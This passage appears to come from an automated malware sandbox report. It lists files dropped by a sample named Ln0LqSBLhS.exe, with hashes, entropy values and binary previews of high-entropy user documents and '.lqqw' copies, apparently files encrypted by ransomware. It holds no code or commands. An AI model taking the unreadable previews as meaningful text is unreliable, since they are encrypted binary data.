                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.840833387291833
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:IFV6aip6lAqCts04B3er5M4Nngq1FI8eokIxsqvZ+ULkJxqjffMbD:d6lAqHtB85M4NngqrIRoF2qvZzLMxqrG
                                                                                                                                                                                                    MD5:92BFFF0F919A8AC76ECB18E3A584E26F
                                                                                                                                                                                                    SHA1:39430DD885DFAB6AD3254F22F7049BBC7BA88F6A
                                                                                                                                                                                                    SHA-256:4B6F5EAED0F22C6CB0D8E3D153674A13A12CD10ADEBF623BBE4B25F0C3394CCF
                                                                                                                                                                                                    SHA-512:B06C5FA9565C204D1EF7E421F5BD8499D16BEBA03183C95ADB859EBBFD738EB540A2D6B366C942AB0A2CC52FDFFDB96A537D037C4282F047D2B6A8658B881F81
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .....C}..JO2...T.....vF'....h9..&s.p[...wu..}.....?%.n...N.mO.....+/.T_.~.!.e...(.p../V.k....3yV....S.....4..)M.u.C...v$..+n..mA5.l.+=,./..r..](..b .6.^...(...v.p..8....y...TX.....Z.r2.#k6.......:......Z..%..(..]......K...(.L......I...!$.J.Q...$....c^...l.f....8*..r....Q;).W.g..7.-......=~*A5!uJ.`..m;.Y...Z.z....7.....[..Pn\......P1.....8..Ivoq8.._/.W.h......Co.j*F..L..%O<.%zA....=.y.....m......e..\...Y|..C*..z...Wa."|.(.VXt....-C.AB......;&.....f.V..~..!...)])...[M.f.b.nrI]....l..S'....I..v.L......./........./..o.Yr.\}r_"Y...g...E8.v.d....=o....n..N|.n..:w.P.4|.q.F.Q.u.A....P./..^r.M...z..R2...b....5.c...B.U..+.....o..m..g..vN.K$.,I.;....u.SP..C.!./.^.I...2...t.....Ty..*..C..n.&N..,vG_u.B..z).....Zc.LCp.V.....A....F.nJv$...X..8_.7bh.Ro.}.>....d.H./.i...~..R.."......Q.W.|"eM......3..y......-{...p.$.)yu..'.|..VP.JZ...lDL.(EG.k....J..`.....'"J....|...5..K.N!..d..{+.3].."..3.."(2.>g..k..&..6.6....p.3.....8._.....~.R7.x.+...~dM..P\..@...1Gr..n.
                                                                                                                                                                                                    C:\Users\user\Documents\EWZCVGNOWT.xlsx.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.840833387291833
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:IFV6aip6lAqCts04B3er5M4Nngq1FI8eokIxsqvZ+ULkJxqjffMbD:d6lAqHtB85M4NngqrIRoF2qvZzLMxqrG
                                                                                                                                                                                                    MD5:92BFFF0F919A8AC76ECB18E3A584E26F
                                                                                                                                                                                                    SHA1:39430DD885DFAB6AD3254F22F7049BBC7BA88F6A
                                                                                                                                                                                                    SHA-256:4B6F5EAED0F22C6CB0D8E3D153674A13A12CD10ADEBF623BBE4B25F0C3394CCF
                                                                                                                                                                                                    SHA-512:B06C5FA9565C204D1EF7E421F5BD8499D16BEBA03183C95ADB859EBBFD738EB540A2D6B366C942AB0A2CC52FDFFDB96A537D037C4282F047D2B6A8658B881F81
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .....C}..JO2...T.....vF'....h9..&s.p[...wu..}.....?%.n...N.mO.....+/.T_.~.!.e...(.p../V.k....3yV....S.....4..)M.u.C...v$..+n..mA5.l.+=,./..r..](..b .6.^...(...v.p..8....y...TX.....Z.r2.#k6.......:......Z..%..(..]......K...(.L......I...!$.J.Q...$....c^...l.f....8*..r....Q;).W.g..7.-......=~*A5!uJ.`..m;.Y...Z.z....7.....[..Pn\......P1.....8..Ivoq8.._/.W.h......Co.j*F..L..%O<.%zA....=.y.....m......e..\...Y|..C*..z...Wa."|.(.VXt....-C.AB......;&.....f.V..~..!...)])...[M.f.b.nrI]....l..S'....I..v.L......./........./..o.Yr.\}r_"Y...g...E8.v.d....=o....n..N|.n..:w.P.4|.q.F.Q.u.A....P./..^r.M...z..R2...b....5.c...B.U..+.....o..m..g..vN.K$.,I.;....u.SP..C.!./.^.I...2...t.....Ty..*..C..n.&N..,vG_u.B..z).....Zc.LCp.V.....A....F.nJv$...X..8_.7bh.Ro.}.>....d.H./.i...~..R.."......Q.W.|"eM......3..y......-{...p.$.)yu..'.|..VP.JZ...lDL.(EG.k....J..`.....'"J....|...5..K.N!..d..{+.3].."..3.."(2.>g..k..&..6.6....p.3.....8._.....~.R7.x.+...~dM..P\..@...1Gr..n.
                                                                                                                                                                                                    C:\Users\user\Documents\GIGIYTFFYT.jpg
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.8561749386820825
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:E+8uRAP2rzY0KP9JJe1bGDezsMqmem6gDmWoOuMXQQkau9RYdjk1kidbD:E+8kb/Y0KvJosOswt36WoUQauQBWRdD
                                                                                                                                                                                                    MD5:284C12AE932A9BD1588EF8620C6E6266
                                                                                                                                                                                                    SHA1:325B4B8BE266C413D3DDC83FB9EAF503C85566FF
                                                                                                                                                                                                    SHA-256:92756710C4827F08620AAE9A2A37F56937A93112E93F64E997911B521B3995DE
                                                                                                                                                                                                    SHA-512:05E7B4729CFE6E37A2646153707B4238B9037DBC9CE1EDA57C1A7F818823BE11B795B8E372D3A05EB00E37FE13468D360A04FACC71E186AECB4031853216C14C
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .x..e1C..L..\...$..y......f..t....).d/.m..s/V..{.:`$...%K.eDn...B.,..=...|_.&}......Lt.4...8...Ut...r...eo\.>.3'.*)jv............U:..c.5.(.?......*u4.%......I\_3V.<...T....Yz&..D.bl.G.X..c~z..1.Y....}.N.{....K.7T..dU..e......]...Q]Bp.f..9i..7...j....N...gQDf.......v..C..$...D...%..I-V..^.2...5-..b...l...j......./.k.^q./........tf..L-`X&s.q}...F_Z..,>...0j../.d..=!X.V.(....R..=..t-.....i#-.mrww>6C.qJ-;rB......._.v.=.(M.s/U..x8.,4,4.&.."........`.g..m...@V)..8#..E......)f..ca......65...i.Y..y...?l.w..f.....]ir.a.&........c..)..Y...oA...0.........Z Y.oG*U_D5R,...)oL.8b...9...]z....I0.!...{.@..f.st\..M.5..~~F..JF.Y.&..}x'.7.#...K.'.2..........^..,x.?........5-P+...}..W...?.....FJ.....h..Zr$#.x70.'<S..1)...dN-....... ....l\.+V.@.Sa...qd.8..J......,.D4.KPR*g..=l.#B.#.go4.$..<....Ejw...I.S1.......?.hv..}3v...}....#.Ui*T............j]s.M..8.....U....U..o.....@.."....&U0.XS.)..0..V.$th......%.v.i.<G.u.'.v*=...X?.VM....o..2...k<.2..!.Sn....
                                                                                                                                                                                                    C:\Users\user\Documents\GIGIYTFFYT.jpg.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.8561749386820825
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:E+8uRAP2rzY0KP9JJe1bGDezsMqmem6gDmWoOuMXQQkau9RYdjk1kidbD:E+8kb/Y0KvJosOswt36WoUQauQBWRdD
                                                                                                                                                                                                    MD5:284C12AE932A9BD1588EF8620C6E6266
                                                                                                                                                                                                    SHA1:325B4B8BE266C413D3DDC83FB9EAF503C85566FF
                                                                                                                                                                                                    SHA-256:92756710C4827F08620AAE9A2A37F56937A93112E93F64E997911B521B3995DE
                                                                                                                                                                                                    SHA-512:05E7B4729CFE6E37A2646153707B4238B9037DBC9CE1EDA57C1A7F818823BE11B795B8E372D3A05EB00E37FE13468D360A04FACC71E186AECB4031853216C14C
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .x..e1C..L..\...$..y......f..t....).d/.m..s/V..{.:`$...%K.eDn...B.,..=...|_.&}......Lt.4...8...Ut...r...eo\.>.3'.*)jv............U:..c.5.(.?......*u4.%......I\_3V.<...T....Yz&..D.bl.G.X..c~z..1.Y....}.N.{....K.7T..dU..e......]...Q]Bp.f..9i..7...j....N...gQDf.......v..C..$...D...%..I-V..^.2...5-..b...l...j......./.k.^q./........tf..L-`X&s.q}...F_Z..,>...0j../.d..=!X.V.(....R..=..t-.....i#-.mrww>6C.qJ-;rB......._.v.=.(M.s/U..x8.,4,4.&.."........`.g..m...@V)..8#..E......)f..ca......65...i.Y..y...?l.w..f.....]ir.a.&........c..)..Y...oA...0.........Z Y.oG*U_D5R,...)oL.8b...9...]z....I0.!...{.@..f.st\..M.5..~~F..JF.Y.&..}x'.7.#...K.'.2..........^..,x.?........5-P+...}..W...?.....FJ.....h..Zr$#.x70.'<S..1)...dN-....... ....l\.+V.@.Sa...qd.8..J......,.D4.KPR*g..=l.#B.#.go4.$..<....Ejw...I.S1.......?.hv..}3v...}....#.Ui*T............j]s.M..8.....U....U..o.....@.."....&U0.XS.)..0..V.$th......%.v.i.<G.u.'.v*=...X?.VM....o..2...k<.2..!.Sn....
                                                                                                                                                                                                    C:\Users\user\Documents\LFOPODGVOH.mp3
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.860913057108456
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:TKpmTVC3Xik794YdocJ6jmJm3UrreQcalVXTxzEAwUm/3NCdmxk9zAVEI3GofqbD:Opmkis94eJAmJmKrvcaLjpU/FW9zIQD
                                                                                                                                                                                                    MD5:0F7839AC8534FCA5D621EF48996BE5E3
                                                                                                                                                                                                    SHA1:04D38CCA549D583EFD99FEBC24F93792F3BC9AAF
                                                                                                                                                                                                    SHA-256:EB8C9A728B908FEEF4D0263DBB6F3F50C7DE95F0599BE7A2DAF6F1C7BFACD415
                                                                                                                                                                                                    SHA-512:F67498E4BCBB5BED644041C310717CA36DB1CAEFC253A663383133F3DE302FEA178AD678C5B424B9613B0D47F55A26763612AF0E5D6E3F1450693798C60B920C
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .i..S[)xB.Jz.I....&.!V.v.......5...<._...n...L..D*...)Y.'..I.l..j..}.Xe0...p.....U ....#W..... ..kP.^0...up..c.V....[.MtsV..DF.+.fz.Y.$..8.....[...:...X..^Q....$..1.~.V....K.....K..'o..G.....H.x"/.../+....N..3.K$..6..I.0.O..EzB.9....k<..t6]z..........E.Ij...S.I.vY../..$.g..........." y..}...1.....[..G...}o.-.TK\..36k...m....3...W..,..$.T..@\..K<.!.K......Itm&.....#......M&..5....[...X.l..Dg".q.~s....v%....?.-......L..NM.[..G..r......i+./.F..M....e....yf..4.W..#.yR...1;.gL."w..p..2u..n-.D..<Z..B..D.....u.+..S...`\...Hy_.%TC...J... .Lt."....H..S%`.y.ewh....5.|I..kO.^.R..q 4.....K8..&d.C.`..\L..q...._R.in...(QJ&.....$..x.L.]Q..Q=.{f;(.]Uu-w...x.Od.U.<.....s`......\.5,.K>..3c.r.h#z..l....t...JC....y..2..G...g..WR .Y.2.....A..o....i..J./..a..YE.s1..Y.f...|Q..[....x.%.*u....t.,.....R.LT.)5\....V9MD^.1.8..a.R._!m&...xO~..}(.....y.....*...s.@.Sz.....<.nQ.....=..?.rO*.!....E..=..\j.#1.....p.{.0S.,....k.?.k....@..H}....9.3.wb...tF..#o... ...).{.v..{.
                                                                                                                                                                                                    C:\Users\user\Documents\LFOPODGVOH.mp3.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.860913057108456
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:TKpmTVC3Xik794YdocJ6jmJm3UrreQcalVXTxzEAwUm/3NCdmxk9zAVEI3GofqbD:Opmkis94eJAmJmKrvcaLjpU/FW9zIQD
                                                                                                                                                                                                    MD5:0F7839AC8534FCA5D621EF48996BE5E3
                                                                                                                                                                                                    SHA1:04D38CCA549D583EFD99FEBC24F93792F3BC9AAF
                                                                                                                                                                                                    SHA-256:EB8C9A728B908FEEF4D0263DBB6F3F50C7DE95F0599BE7A2DAF6F1C7BFACD415
                                                                                                                                                                                                    SHA-512:F67498E4BCBB5BED644041C310717CA36DB1CAEFC253A663383133F3DE302FEA178AD678C5B424B9613B0D47F55A26763612AF0E5D6E3F1450693798C60B920C
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .i..S[)xB.Jz.I....&.!V.v.......5...<._...n...L..D*...)Y.'..I.l..j..}.Xe0...p.....U ....#W..... ..kP.^0...up..c.V....[.MtsV..DF.+.fz.Y.$..8.....[...:...X..^Q....$..1.~.V....K.....K..'o..G.....H.x"/.../+....N..3.K$..6..I.0.O..EzB.9....k<..t6]z..........E.Ij...S.I.vY../..$.g..........." y..}...1.....[..G...}o.-.TK\..36k...m....3...W..,..$.T..@\..K<.!.K......Itm&.....#......M&..5....[...X.l..Dg".q.~s....v%....?.-......L..NM.[..G..r......i+./.F..M....e....yf..4.W..#.yR...1;.gL."w..p..2u..n-.D..<Z..B..D.....u.+..S...`\...Hy_.%TC...J... .Lt."....H..S%`.y.ewh....5.|I..kO.^.R..q 4.....K8..&d.C.`..\L..q...._R.in...(QJ&.....$..x.L.]Q..Q=.{f;(.]Uu-w...x.Od.U.<.....s`......\.5,.K>..3c.r.h#z..l....t...JC....y..2..G...g..WR .Y.2.....A..o....i..J./..a..YE.s1..Y.f...|Q..[....x.%.*u....t.,.....R.LT.)5\....V9MD^.1.8..a.R._!m&...xO~..}(.....y.....*...s.@.Sz.....<.nQ.....=..?.rO*.!....E..=..\j.#1.....p.{.0S.,....k.?.k....@..H}....9.3.wb...tF..#o... ...).{.v..{.
                                                                                                                                                                                                    C:\Users\user\Documents\NYMMPCEIMA.jpg
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.839962428573663
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:pflzkbd8ivvMRLxqjbSv34w1edid7aZE6XoYRTJafEMRVZUbD:3Abd8isR9qj6C0d7wXhTJafjrYD
                                                                                                                                                                                                    MD5:8E25E62864F7EDDF717D8BF798930987
                                                                                                                                                                                                    SHA1:5826DF2F61025C11412A831BFA3B5ECAF63E9709
                                                                                                                                                                                                    SHA-256:C84BDC6B0292B4FBAEB60AEC4E23F530F8F03D700D0BF2531420FCC301DDD180
                                                                                                                                                                                                    SHA-512:948E5084CC687B232A991C591C89CBFABF8F92114D176A2E84E0D1975A3F7F2164BC4DD52C731FF6C3DFFF575FEE83492B5F5769415A4A0561F2C7C03101185E
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .T..d.3Y"To...$aJ_.9.6x.......g#.....u.u.yr&......>..]..!S.E..Lw..w.t,....L...r...3,..3..X......I]...x.>.....L.!-k.ky.......6..3.+.:....N......;.q7...U...)..J..f....x.+...X....\.F..x.i3...i....._.x.:.......hT.V..4...@v.c.ruh..@\8...9i...3.+.L`..'<...S."..u."...o>.y.%....FSn5.y...F....]w..dSOx.d.fL^..u...G.*.u>;...^.Z......I..........#...X.@.C...z.f...M.2(#.......yn..wU=s..-.G....R.,...Wc............>...q.J...fv..h.c.....B.....K.A ..P...DpI.....].X.r<),..j.....Tr......5.#...4&........!....qD.19r.7..0.#`.!..+......%.Q....f...1.0.U.2....7.l..q@......6..T0......+...{...qS.jq...<f....s..g.;..!_.|K.....]5s."...g......Hg....Im.q.......(.b.=.U..8f......D...)N..`..{-..,..b...}..-u3o....Z.z......y.8.#n.k....u...\5.<}8......../..!...~O..qp.6..pAI.......jwe....h...).Q6..tB..Vo.x.....5.[I.)fA...~.09,....X."G..m...._..c&x.....Q.Q.G~.K..)W...G(...3....6.%...CTXs.L..H.#(..t$....PD.....@....P0.@E............?.2>...........O9..O.(...?..l...nL...J....#.
                                                                                                                                                                                                    C:\Users\user\Documents\NYMMPCEIMA.jpg.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.839962428573663
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:pflzkbd8ivvMRLxqjbSv34w1edid7aZE6XoYRTJafEMRVZUbD:3Abd8isR9qj6C0d7wXhTJafjrYD
                                                                                                                                                                                                    MD5:8E25E62864F7EDDF717D8BF798930987
                                                                                                                                                                                                    SHA1:5826DF2F61025C11412A831BFA3B5ECAF63E9709
                                                                                                                                                                                                    SHA-256:C84BDC6B0292B4FBAEB60AEC4E23F530F8F03D700D0BF2531420FCC301DDD180
                                                                                                                                                                                                    SHA-512:948E5084CC687B232A991C591C89CBFABF8F92114D176A2E84E0D1975A3F7F2164BC4DD52C731FF6C3DFFF575FEE83492B5F5769415A4A0561F2C7C03101185E
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .T..d.3Y"To...$aJ_.9.6x.......g#.....u.u.yr&......>..]..!S.E..Lw..w.t,....L...r...3,..3..X......I]...x.>.....L.!-k.ky.......6..3.+.:....N......;.q7...U...)..J..f....x.+...X....\.F..x.i3...i....._.x.:.......hT.V..4...@v.c.ruh..@\8...9i...3.+.L`..'<...S."..u."...o>.y.%....FSn5.y...F....]w..dSOx.d.fL^..u...G.*.u>;...^.Z......I..........#...X.@.C...z.f...M.2(#.......yn..wU=s..-.G....R.,...Wc............>...q.J...fv..h.c.....B.....K.A ..P...DpI.....].X.r<),..j.....Tr......5.#...4&........!....qD.19r.7..0.#`.!..+......%.Q....f...1.0.U.2....7.l..q@......6..T0......+...{...qS.jq...<f....s..g.;..!_.|K.....]5s."...g......Hg....Im.q.......(.b.=.U..8f......D...)N..`..{-..,..b...}..-u3o....Z.z......y.8.#n.k....u...\5.<}8......../..!...~O..qp.6..pAI.......jwe....h...).Q6..tB..Vo.x.....5.[I.)fA...~.09,....X."G..m...._..c&x.....Q.Q.G~.K..)W...G(...3....6.%...CTXs.L..H.#(..t$....PD.....@....P0.@E............?.2>...........O9..O.(...?..l...nL...J....#.
                                                                                                                                                                                                    C:\Users\user\Documents\PALRGUCVEH.docx
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.828850069390001
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:TwhKQ/a6qmIm6caPBmTp7MObtwjAP5G8m4Mucf5bD:8hc6qmRa5mV7TtwjAPz9chD
                                                                                                                                                                                                    MD5:FE3CB6821089575584371B11E06B496E
                                                                                                                                                                                                    SHA1:42CC8655FB689E0DF2308B1A325439826F2A7F5F
                                                                                                                                                                                                    SHA-256:6DC51ACD52C209C151F2A15876ED63B09043CC90FA3D36342AC3DD9E611C926A
                                                                                                                                                                                                    SHA-512:D7237EBDF732B7F56F48B2B60340D1937CF38FBCC975D3434666AF2A7E7041FA278B728F31B5F71288E95A76B712A9B4CAD7E5984140F0A6E45B62E6ADF997C4
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..X........*..R...kG....]..k....Z.\....9ua.!4...U..'.;....v......D.8..+'....U....z./..!..."R.f....R.Y.u...`..P.&..h..l..l....xr....bn..k.....1..>=.x.:..9<w&.J+.L.;...b..h....?c.~R\.(.....OoU....W....]O1.Wm.k..8jZ..._.....S.K.g.m..a..JO.o.9...j..[....W..8*....{..]..or.O.+...h...b4y.......YN.........d..........i.....@....w...MN0To..=n.....y...7...}.u._.8..\..91...].y..H.n.c._..6..E...W......Q........s ee.....#.`.}I.QVZ..cS.O.........0_...5.....6r.).k..5.c. .....z.P......Ba...4..?...Oq......Cf..z..g.....u:Qb.;....z..yzB.T.^..9UJvR.............k......]...............1?I.......O.+.+.y....zO*S..9..R..#....Vn./........]0..m.....&....<.|....J.cS..G..pV?..S....*&%N9....R3..$.1O.p..SE.f...Sx2. ..L..G.h.bCz...f.r...l...W.B.a'j..:V...h.W..B9...L%Jo8...../.<MyXFbcF....e.f.S10....x.....C...n._[....a./&.n....uE#_.....0...r.......d._rbmu..l..Y..#|..`..>4...gK...P.5.m~]m0.....=.#..:.}z).Q...........w....+.....|?.h1....+.N......\8].N..7...3...@iY.w
                                                                                                                                                                                                    C:\Users\user\Documents\PALRGUCVEH.docx.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.828850069390001
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:TwhKQ/a6qmIm6caPBmTp7MObtwjAP5G8m4Mucf5bD:8hc6qmRa5mV7TtwjAPz9chD
                                                                                                                                                                                                    MD5:FE3CB6821089575584371B11E06B496E
                                                                                                                                                                                                    SHA1:42CC8655FB689E0DF2308B1A325439826F2A7F5F
                                                                                                                                                                                                    SHA-256:6DC51ACD52C209C151F2A15876ED63B09043CC90FA3D36342AC3DD9E611C926A
                                                                                                                                                                                                    SHA-512:D7237EBDF732B7F56F48B2B60340D1937CF38FBCC975D3434666AF2A7E7041FA278B728F31B5F71288E95A76B712A9B4CAD7E5984140F0A6E45B62E6ADF997C4
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..X........*..R...kG....]..k....Z.\....9ua.!4...U..'.;....v......D.8..+'....U....z./..!..."R.f....R.Y.u...`..P.&..h..l..l....xr....bn..k.....1..>=.x.:..9<w&.J+.L.;...b..h....?c.~R\.(.....OoU....W....]O1.Wm.k..8jZ..._.....S.K.g.m..a..JO.o.9...j..[....W..8*....{..]..or.O.+...h...b4y.......YN.........d..........i.....@....w...MN0To..=n.....y...7...}.u._.8..\..91...].y..H.n.c._..6..E...W......Q........s ee.....#.`.}I.QVZ..cS.O.........0_...5.....6r.).k..5.c. .....z.P......Ba...4..?...Oq......Cf..z..g.....u:Qb.;....z..yzB.T.^..9UJvR.............k......]...............1?I.......O.+.+.y....zO*S..9..R..#....Vn./........]0..m.....&....<.|....J.cS..G..pV?..S....*&%N9....R3..$.1O.p..SE.f...Sx2. ..L..G.h.bCz...f.r...l...W.B.a'j..:V...h.W..B9...L%Jo8...../.<MyXFbcF....e.f.S10....x.....C...n._[....a./&.n....uE#_.....0...r.......d._rbmu..l..Y..#|..`..>4...gK...P.5.m~]m0.....=.#..:.}z).Q...........w....+.....|?.h1....+.N......\8].N..7...3...@iY.w
                                                                                                                                                                                                    C:\Users\user\Documents\PALRGUCVEH.xlsx
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.83779775309141
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:O6LG3/4k3c7+M/+KL4FZB55TV8Zst0b5wH0epWSHA28Lc/YFXsx1GExZF6rm044l:O6m/B3cl/+KkFr5HBky0OHwLdF8x/emo
                                                                                                                                                                                                    MD5:FD6F8E5EBFC2CBB7B2FF70C57436B8F9
                                                                                                                                                                                                    SHA1:45C6682305B071ACB1AFBE1A87CF593E882E88FE
                                                                                                                                                                                                    SHA-256:38AFD95D10522A32A202F1F949DF4CE51E9FA2FE5190C7DCE6E6B8032774E332
                                                                                                                                                                                                    SHA-512:BC8C2E491F2CF7CAD5690A03B75C566A615F84C10158A95064CBC5DCCAEE2EC9A77F4143D46546BB31B98EB8D8327FC82C44FDF7EF348080D4195DC3DA44041E
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..;2/..8`.3kp.^..0.a.F#......Pd..(..,.p@..hOPM..E..z.$:.'].....h.-.V3..q...s..WE..X..A)p.H........P..^.;qX...p...x.'=..=..]..{...=..A......{l...<.d9<.4<N......w.)..{u....x..-..~o....g.45..L..3.'i.CwT......4.9...,.a.a3.}'.41....u.>...P*.3^.+l.>..L..F...2...)..6.....Vnu...........6....\..]i........./I.lc..x .|.T...c.,.."..~../...6|.......{.I..^..2..I[.....n.4`..{...-1.g..*^.^.y%.!....I".x..T..S.......x....OK#.).k...E...<i..p...s..ym......7.pFQ....h..^.Q..%s...mZ.Uwhi.....p....Ayr.u...%.'Vi..JC.3..y..&....G.o$...._...#.C....Y..\.....n..._e-B...&..V..`B...Xn8r......K.iAEBKW..M..7....-.q.....<......a....`...I..Nl.....$......e....1..S.I.ee+..Z...lf.^8I8Sp.....H.:.X[.r.%i..\.:.f... l.R....k../?iQ.&.t....*.....I{....g...7..4.IN......+<..m.#)7O0......9....C}..r....P....B5JK+j..~.x.3G.]|Bj,..J..f..L0.7o...=,4o..s..W...t.Zy..xb.....G......l....'...Q...u+......-...@S4....v........^`..>..l...E.+q.........?..-.au...D|..i...'....KO....+ .(..l...'P.m..)..
                                                                                                                                                                                                    C:\Users\user\Documents\PALRGUCVEH.xlsx.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.83779775309141
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:O6LG3/4k3c7+M/+KL4FZB55TV8Zst0b5wH0epWSHA28Lc/YFXsx1GExZF6rm044l:O6m/B3cl/+KkFr5HBky0OHwLdF8x/emo
                                                                                                                                                                                                    MD5:FD6F8E5EBFC2CBB7B2FF70C57436B8F9
                                                                                                                                                                                                    SHA1:45C6682305B071ACB1AFBE1A87CF593E882E88FE
                                                                                                                                                                                                    SHA-256:38AFD95D10522A32A202F1F949DF4CE51E9FA2FE5190C7DCE6E6B8032774E332
                                                                                                                                                                                                    SHA-512:BC8C2E491F2CF7CAD5690A03B75C566A615F84C10158A95064CBC5DCCAEE2EC9A77F4143D46546BB31B98EB8D8327FC82C44FDF7EF348080D4195DC3DA44041E
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..;2/..8`.3kp.^..0.a.F#......Pd..(..,.p@..hOPM..E..z.$:.'].....h.-.V3..q...s..WE..X..A)p.H........P..^.;qX...p...x.'=..=..]..{...=..A......{l...<.d9<.4<N......w.)..{u....x..-..~o....g.45..L..3.'i.CwT......4.9...,.a.a3.}'.41....u.>...P*.3^.+l.>..L..F...2...)..6.....Vnu...........6....\..]i........./I.lc..x .|.T...c.,.."..~../...6|.......{.I..^..2..I[.....n.4`..{...-1.g..*^.^.y%.!....I".x..T..S.......x....OK#.).k...E...<i..p...s..ym......7.pFQ....h..^.Q..%s...mZ.Uwhi.....p....Ayr.u...%.'Vi..JC.3..y..&....G.o$...._...#.C....Y..\.....n..._e-B...&..V..`B...Xn8r......K.iAEBKW..M..7....-.q.....<......a....`...I..Nl.....$......e....1..S.I.ee+..Z...lf.^8I8Sp.....H.:.X[.r.%i..\.:.f... l.R....k../?iQ.&.t....*.....I{....g...7..4.IN......+<..m.#)7O0......9....C}..r....P....B5JK+j..~.x.3G.]|Bj,..J..f..L0.7o...=,4o..s..W...t.Zy..xb.....G......l....'...Q...u+......-...@S4....v........^`..>..l...E.+q.........?..-.au...D|..i...'....KO....+ .(..l...'P.m..)..
                                                                                                                                                                                                    C:\Users\user\Documents\PALRGUCVEH\EIVQSAOTAQ.pdf
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
